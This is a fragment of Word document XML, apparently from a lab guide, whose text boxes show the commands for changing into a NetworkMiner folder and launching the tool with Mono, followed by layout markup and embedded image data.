                          <a:ext cx="5986577" cy="3761411"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5986577" cy="3761411"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2994" name="Rectangle 2994"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1834768" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="494D08A5" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:b/>
                                  <w:i/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>cd NetworkMiner_2</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2995" name="Rectangle 2995"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1381074" y="0"/>
                            <a:ext cx="81888" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6EF5659D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:b/>
                                  <w:i/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>-</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2996" name="Rectangle 2996"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1442034" y="0"/>
                            <a:ext cx="116751" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="03FF2366" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:b/>
                                  <w:i/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>7</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2997" name="Rectangle 2997"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1528902" y="0"/>
                            <a:ext cx="81888" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="373C6CD5" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:b/>
                                  <w:i/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>-</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="40317" name="Rectangle 40317"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1589862" y="0"/>
                            <a:ext cx="116751" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="2B456FBA" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:b/>
                                  <w:i/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>3</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="40318" name="Rectangle 40318"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1678254" y="0"/>
                            <a:ext cx="89995" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="10E374AF" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:b/>
                                  <w:i/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>/</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2999" name="Rectangle 2999"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1745310" y="0"/>
                            <a:ext cx="55740" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7AAC309E" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:b/>
                                  <w:i/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="3000" name="Rectangle 3000"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="202692"/>
                            <a:ext cx="2335620" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="2600A5B0" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:b/>
                                  <w:i/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>mono NetworkMiner.exe</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="3001" name="Rectangle 3001"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1757502" y="202692"/>
                            <a:ext cx="55740" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="31CEF888" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:b/>
                                  <w:i/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="3002" name="Rectangle 3002"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5944820" y="3612211"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5575213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007" name="Picture 3007"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId69"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="38303" y="388815"/>
                            <a:ext cx="5873750" cy="3303905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="3008" name="Shape 3008"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="25603" y="376115"/>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432DC1" id="Group 40343" o:spid="_x0000_s1216" style="width:471.4pt;height:296.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59865,37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&#10;CAIeA8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